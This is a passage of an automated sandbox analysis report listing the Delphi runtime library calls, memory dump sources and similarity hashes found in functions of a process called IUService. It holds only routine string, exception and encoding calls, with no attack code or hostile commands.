                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010C23), ref: 50010B5F
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50010C23), ref: 50010B90
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50010C23), ref: 50010B95
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010C23), ref: 50010BB2
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50010C23), ref: 50010BBE
                                                                                                                                            • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50010C23), ref: 50010BCC
                                                                                                                                            • @Character@TCharacter@IsAscii$qqrb.RTL120(00000000,50010C23), ref: 50010BDC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500119B9), ref: 500118A6
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500119B9), ref: 500118C3
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500119B9), ref: 500118FB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,500119B9), ref: 5001192C
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500119B9), ref: 50011931
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500119B9), ref: 5001194E
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,500119B9), ref: 5001195A
                                                                                                                                            • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,500119B9), ref: 50011992
                                                                                                                                            • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120(00000000,500119B9), ref: 50011997
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011268), ref: 5001116A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011268), ref: 50011187
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011268), ref: 500111BF
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50011268), ref: 500111F0
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50011268), ref: 500111F5
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011268), ref: 50011212
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50011268), ref: 5001121E
                                                                                                                                            • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50011268), ref: 5001122C
                                                                                                                                            • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120(00000000,50011268), ref: 50011231
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B37F
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B391
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3A1
                                                                                                                                            • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(?,00000000,5002B443,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3A9
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3C6
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(00000001,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,5002B2C2,?,?), ref: 5002B3DB
                                                                                                                                            • @System@@DynArrayHigh$qqrv.RTL120 ref: 5002B3E6
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5002B408
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5002B416
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,50030A24), ref: 500309A6
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,00000000,50030A24), ref: 500309A1
                                                                                                                                              • Part of subcall function 500265E8: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265F7
                                                                                                                                              • Part of subcall function 500265E8: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 5002661C
                                                                                                                                              • Part of subcall function 500265E8: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026642,?,?,?,?,00000000), ref: 50026627
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,00000000,50030A24), ref: 50030992
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030A24), ref: 50030975
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500391E7
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 50039290
                                                                                                                                              • Part of subcall function 500391B0: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,500392C3,?,?,?,?,00000000,00000000,00000000,?,5003078F,00000000,500307EF), ref: 500392A3
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030A24), ref: 500309B2
                                                                                                                                            • @Variants@VarTypeAsText$qqrxus.RTL120(00000000,50030A24), ref: 500309C6
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,50030A24), ref: 500309E3
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,50030A24), ref: 500309F2
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50030A24), ref: 500309F7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$Stringx20$LoadRaiseRecxiStringpx14Sysutils@Text$qqrxusTypeVariants@$Asg$qqrr20Cat3$qqrr20Except$qqrvException@$bctr$qqrx20String$qqrp20Stringt2$CharClassClassoCreate$qqrp17Error$qqrucFindFormat$qqrx20FromInstance$qqruiLen$qqrr20List$qqrvMetaResourceStringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3925043654-0
                                                                                                                                            • Opcode ID: 131c35e12c0e8e47e1fde943e8facb4ce90f3ede14ba4413e4a48e2dfa573d87
                                                                                                                                            • Instruction ID: 4ca92997f7d99f258bade771785e71a5bab742ac08337daf03ab8f9c2463306d
                                                                                                                                            • Opcode Fuzzy Hash: 131c35e12c0e8e47e1fde943e8facb4ce90f3ede14ba4413e4a48e2dfa573d87
                                                                                                                                            • Instruction Fuzzy Hash: 11212A749056888FEB05CBE8E891AEEB7F5EB58300F40866AE904A3341D7749A058BA1
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 500160A1
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500160F4
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 50016157
                                                                                                                                            • CharUpperBuffA.USER32(?,00000100), ref: 500161CB
                                                                                                                                            • @System@@UniqueStringA$qqrr27System@%AnsiStringT$us$i0$%.RTL120(?,00000100), ref: 500161D3
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(?,00000100), ref: 500161F4
                                                                                                                                            • CharUpperBuffA.USER32(00000000,?,?,00000100), ref: 50016204
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 50016266
                                                                                                                                            • @System@@EnsureAnsiString$qqrr27System@%AnsiStringT$us$i0$%us.RTL120 ref: 500162A8
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(50016309), ref: 500162FC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiString$System@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$Internal$BuffCharUpper$A$qqrr27Clr$qqrpvEnsureRef$qqrpvString$qqrr27T$us$i0$%T$us$i0$%usUnique
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3754126448-0
                                                                                                                                            • Opcode ID: 1ff42b0232398fc2689e3e5e0853df67aac0a3a8058dbe02572faacc32753696
                                                                                                                                            • Instruction ID: 7aeabf7012fadaf89375e13735e907e93f1881e5daf33cb3c72b493a73839c93
                                                                                                                                            • Opcode Fuzzy Hash: 1ff42b0232398fc2689e3e5e0853df67aac0a3a8058dbe02572faacc32753696
                                                                                                                                            • Instruction Fuzzy Hash: A9718B30A042989FDB25CF68DC917D9B7F5AF45300F5082A6EA58DB242D7B1DEC4CB94
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 50016423
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 50016472
                                                                                                                                            • @System@@UniqueStringU$qqrr20System@UnicodeString.RTL120(00000000,500165BA), ref: 500164B2
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 500164D1
                                                                                                                                            • CharUpperBuffW.USER32(00000000,?,00000000,500165BA), ref: 500164E1
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500165BA), ref: 50016536
                                                                                                                                            • @Character@TCharacter@IsLetterOrDigit$qqrb.RTL120(00000000,500165BA), ref: 50016561
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,500165BA), ref: 5001656F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringUnicode$System@System@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$BuffCharDigit$qqrbEnsureLetterString$qqrr20U$qqrr20UniqueUpper
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 725871508-0
                                                                                                                                            • Opcode ID: aee2499e3083b8a89e48e94aaf61e96d8fcfb8174b222e99395ef528110b3ede
                                                                                                                                            • Instruction ID: 371616eb350b96e3d621023fbff1a77728028cc82446cf9de742119a6f8d3487
                                                                                                                                            • Opcode Fuzzy Hash: aee2499e3083b8a89e48e94aaf61e96d8fcfb8174b222e99395ef528110b3ede
                                                                                                                                            • Instruction Fuzzy Hash: B6616E30A0128A9FDF01CFA8DD816AEB7F6EF44314F608266E904EB255D770DE81CB90
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A88E), ref: 5000A716
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(?,00000000,5000A88E), ref: 5000A736
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A75D
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A78A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A7C4
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120 ref: 5000A83E
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120 ref: 5000A843
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(00000001), ref: 5000A870
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$Unicode$StringSystem@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$ArrayLength$qqrv$EnsureLen$qqrx20String$qqrr20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4245238830-0
                                                                                                                                            • Opcode ID: af8f6a36bebf27765a23cdc18af7a898d4f77c15dba28067d957638e5394ac34
                                                                                                                                            • Instruction ID: 6d2edc206bd9f8d921c39b7a1cc1f24274515dbb8e96becc019c4f36c3429797
                                                                                                                                            • Opcode Fuzzy Hash: af8f6a36bebf27765a23cdc18af7a898d4f77c15dba28067d957638e5394ac34
                                                                                                                                            • Instruction Fuzzy Hash: 4A518F30E0525ADFEB01DFA8C991AAEB7F1FF45300FA082B5D545A7251E774AE81CB80
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C518
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@TStringBuilder@set_Length$qqri.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C52D
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C54A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C572
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C59B
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C5B8
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C5D7
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5002C60C,?,?,?,?,?,?,5002C3FA,?,?,?,?,00000000), ref: 5002C5F1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001018B), ref: 5001008E
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001018B), ref: 500100AB
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001018B), ref: 500100E3
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5001018B), ref: 50010114
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5001018B), ref: 50010119
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001018B), ref: 50010136
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,5001018B), ref: 50010142
                                                                                                                                            • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,5001018B), ref: 50010150
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@TEncoding@GetUnicode$qqrv.RTL120(00000000,5002D4CE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D402
                                                                                                                                              • Part of subcall function 5002DF70: @Sysutils@TUnicodeEncoding@$bctr$qqrv.RTL120(00000000,?,5002D407,00000000,5002D4CE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002DF82
                                                                                                                                              • Part of subcall function 5002DF70: InterlockedCompareExchange.KERNEL32(500A6CA4,00000000,00000000), ref: 5002DF92
                                                                                                                                              • Part of subcall function 5002DF70: @System@TObject@Free$qqrv.RTL120(00000000,?,5002D407,00000000,5002D4CE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002DF9D
                                                                                                                                              • Part of subcall function 5002D37C: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D38D
                                                                                                                                              • Part of subcall function 5002D37C: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D396
                                                                                                                                              • Part of subcall function 5002D37C: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D3A1
                                                                                                                                            • @Sysutils@TEncoding@GetUnicode$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D41D
                                                                                                                                            • @Sysutils@TEncoding@GetBigEndianUnicode$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D426
                                                                                                                                            • @Sysutils@TEncoding@GetBigEndianUnicode$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D441
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D482
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D4A6
                                                                                                                                            • @System@@FinalizeArray$qqrpvt1ui.RTL120(5002D4D5,?,00000000,00000000,00000000,00000000,00000000), ref: 5002D4C8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002BB82), ref: 5002BAC9
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002BB82), ref: 5002BAF8
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002BB82), ref: 5002BAFD
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002BB82), ref: 5002BB20
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002BB82), ref: 5002BB25
                                                                                                                                            • @Sysutils@TStringBuilder@set_Length$qqri.RTL120(00000000,5002BB82), ref: 5002BB31
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002BB82), ref: 5002BB4E
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5002BB82), ref: 5002BB67
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
